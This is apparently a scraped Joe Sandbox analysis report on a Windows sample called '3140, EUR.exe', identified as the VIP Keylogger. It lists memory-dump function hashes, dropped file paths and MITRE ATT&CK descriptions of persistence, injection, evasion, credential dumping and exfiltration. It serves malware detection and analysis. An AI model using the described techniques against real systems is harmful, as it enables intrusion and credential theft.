Opcode Fuzzy Hash: 3866a4ac3ee0e1cd4adc56212a5639bc8be6c7df437d6961401a0c736c46347c
Instruction Fuzzy Hash: E721E378D062098FCB41EFA8D8455EEBFF5FF49200F10516AE805B7220EB315A85CFA1

Function 0185D463 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4121852365.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_185d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: bb2494b05cd299f35e8893e2f53f05c0bf3f5b29e7e5af130ce2db885794f2b1
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C911DF76404240CFCB02CF54D5C4B16BF61FB94318F24C6A9EC094B257C336D55ACBA2

Function 056EF668 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1cebea0ab3c760da3c416fd42f516b7886858d3919d40d667eb6efeb084c01d
Instruction ID: daeb17f12c275c46ff8d3fab756bfb6e7a0018fcce691985cecd4da3be958771
Opcode Fuzzy Hash: d1cebea0ab3c760da3c416fd42f516b7886858d3919d40d667eb6efeb084c01d
Instruction Fuzzy Hash: 93113A70E01109DFDB44DFADE58469EBBF2FB45300F10D5A9C4189B365EB345A858F81

Function 056E5E98 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5286744f5831992aad6fb1795dcc3694266213e8055224e73e0a928e612c686d
Instruction ID: 72678b65b1e206a981373b9b9e7e669a1d02a6a3f217cc445df00dcbff2bb412
Opcode Fuzzy Hash: 5286744f5831992aad6fb1795dcc3694266213e8055224e73e0a928e612c686d
Instruction Fuzzy Hash: 8A012D32B062546FCF168EA898505AE3FB7EBD9750F148016F906C7740DE75CD11DBA1

Function 0186D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4121937421.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_186d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 760b50fe62b66d7a841c7a808dfe42d66a0c4d0fe8807f88384f64384beaedbf
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A711BB75604284CFDB12CF54D9C4B16FFA2FB84314F24C6AAD8898B252C33AD44ACB62

Function 056EE8E8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5426d61147c70105ea69f15ece0b1ee974ffe54a4b6abed639ab9525dce34791
Instruction ID: ee2cbe429a190edc87e6f9839bfceb547946e33249787d34118de33bece9df05
Opcode Fuzzy Hash: 5426d61147c70105ea69f15ece0b1ee974ffe54a4b6abed639ab9525dce34791
Instruction Fuzzy Hash: 2E116D74E0520ADFCB02CFA8E8449AEBBB5FF89300F508066D910A3351DB395E56DF91

Function 056EABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a972c5d6c3afd8083c1a7aea748dccb92b557e9e68e8b924bc32e0abd20f98
Instruction ID: ad07a10e68bf5d5be9e617d281363dc597602c4841fc61fcd42d6a2b6225a178
Opcode Fuzzy Hash: 84a972c5d6c3afd8083c1a7aea748dccb92b557e9e68e8b924bc32e0abd20f98
Instruction Fuzzy Hash: 26F0F6353026104B87155A6E985CA2AB6DEFFC8E5131950BAE90AC7361EF20CC07C790

Function 056E28AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47f2a8a1f6f7811aa70b050a1d65e18a732b2d719b7c4b5e603fb5e2a51dd7c
Instruction ID: 9d7878ef90dd39b7dc2d89ec88e02f44a2bd583f7e3d1ed0c95eaa4a0470820d
Opcode Fuzzy Hash: c47f2a8a1f6f7811aa70b050a1d65e18a732b2d719b7c4b5e603fb5e2a51dd7c
Instruction Fuzzy Hash: 17E0C232E2022A578B00EAA1DC004EFB738EE91620B804222D56433100EB306659C6A2

Function 056E28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2d76d2e9d7f40e4f54c3c887345f2a1e68b98b972e82cf05ed83f4f2c0f7dd
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 0e2d76d2e9d7f40e4f54c3c887345f2a1e68b98b972e82cf05ed83f4f2c0f7dd
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 056EAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0764beaf451176840faec9ac91539c56227175973fc1d5fd8206bd2e353c39a
Instruction ID: 8855cecd9b5bc40436a27773e4932008b9a6bd7a926b2a12e197da747f0bef10
Opcode Fuzzy Hash: b0764beaf451176840faec9ac91539c56227175973fc1d5fd8206bd2e353c39a
Instruction Fuzzy Hash: 69D0673AB40018DFCF049F99E8808DDFBB6FB98321B148157F915A3261CA319925DF54

Function 056E6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0577fbc3329800b8821d7d5e8b2c6003503b6e7e8167cd3432819779309c97
Instruction ID: 9b081d991639d2b5f27f37326359aa1478fc36e6cfb3884b8cf28ae3d373f840
Opcode Fuzzy Hash: 0c0577fbc3329800b8821d7d5e8b2c6003503b6e7e8167cd3432819779309c97
Instruction Fuzzy Hash: 60C012302443094FC641E779FD595557BAEE6903407409520E4090665EDF78DDD94A90

Non-executed Functions

Function 056E6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 056E695E
\;^q, xrefs: 056E6936
\;^q, xrefs: 056E6952
\;^q, xrefs: 056E692C

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: b58bb7cd4d1cb3007c9c0517540c3df6d5dd1b78b46c6834fcd1f7d70d61c091
Instruction ID: af342b2ff64acecb15e4295ac263446e21be77054351ce7ef09e4be4039ca6d6
Opcode Fuzzy Hash: b58bb7cd4d1cb3007c9c0517540c3df6d5dd1b78b46c6834fcd1f7d70d61c091
Instruction Fuzzy Hash: 8901DF31B431068FCB24CE2CE54892933EBBFA8A60725446AE446CF3B4DA31EC42C790

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3140, EUR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3140, EUR.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lkuPOyvaWlIu.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21y1z2oz.3h0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpwuiogt.yij.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0yqbczp.qe4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mswb0zbg.qqo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n004ova5.pic.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2vtgbrs.lki.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sh1a2noa.sdj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ps0e4k.ji4.psm1

C:\Users\user\AppData\Local\Temp\tmp4A2.tmp

Windows Analysis Report
3140, EUR.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre